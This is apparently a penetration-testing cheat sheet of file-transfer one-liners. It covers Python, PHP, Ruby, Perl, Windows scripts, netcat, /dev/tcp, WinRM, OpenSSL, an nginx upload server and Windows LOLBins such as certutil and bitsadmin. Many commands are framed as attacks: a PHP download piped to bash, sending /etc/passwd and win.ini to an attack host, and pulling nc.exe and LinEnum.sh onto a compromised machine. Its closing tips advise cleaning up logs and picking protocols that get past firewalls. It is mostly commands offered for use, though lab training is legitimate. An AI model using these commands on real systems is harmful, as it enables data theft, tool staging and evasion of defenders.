Programming Language Methods
Python
Copy # Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'
# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'
# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})' PHP
Copy # Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'
# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash Ruby and Perl
Copy # Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'
# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");' Windows Scripting Methods
JavaScript (wget.js)
Copy var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1)); Execute with: cscript.exe /nologo wget.js URL output_file
VBScript (wget.vbs)
Copy dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with Execute with: cscript.exe /nologo wget.vbs URL output_file
Netcat and Network Transfer Methods
Basic Netcat Transfer
Copy # Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe
# Sender
nc -q 0 target_IP 8000 < file_name.exe Ncat with Enhanced Features
Copy # Receiver
ncat -l -p 8000 --recv-only > file_name.exe
# Sender
ncat --send-only target_IP 8000 < file_name.exe Alternative Methods
Copy # Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe
# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe
# Using /dev/tcp (No Netcat)
cat < /dev/tcp/attack_IP/443 > file_name.exe PowerShell Session File Transfer
WinRM Setup and Transfer
Copy # Test Connection
Test-NetConnection -ComputerName target_name -Port 5985
# Create Session
$Session = New-PSSession -ComputerName target_name
# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session Protected File Transfers
Windows Encryption
Copy # Encrypt String
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"
# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"
# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin
# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes Linux Encryption
Copy # Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd HTTP/S File Upload Server
Nginx Upload Server Setup
Copy # Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
# Nginx Configuration (/etc/nginx/sites-available/upload.conf)
server {
listen 9001;
location /SecretUploadDirectory/ {
root /var/www/uploads;
dav_methods PUT;
}
}
# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service
# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt Living off The Land (LOLBins/GTFOBins)
Windows LOLBins Examples
Copy # CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini
# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe
# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" Linux GTFOBins Examples
Copy # OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh Best Practices
Security Considerations
Always encrypt sensitive data before transfer
Use secure protocols when available (HTTPS, SFTP, SSH)
Clean up files and logs after transfer
Protocol Selection
Consider firewall restrictions
Use commonly allowed protocols (HTTP/HTTPS)
Have multiple methods ready as backup
Authentication and Access
Use strong, unique passwords for encrypted transfers
Remove temporary access after transfer completion
Monitor for security alerts during transfer
Testing and Verification
Verify file integrity after transfer
Test transfer methods in lab environment first
Document successful methods for future reference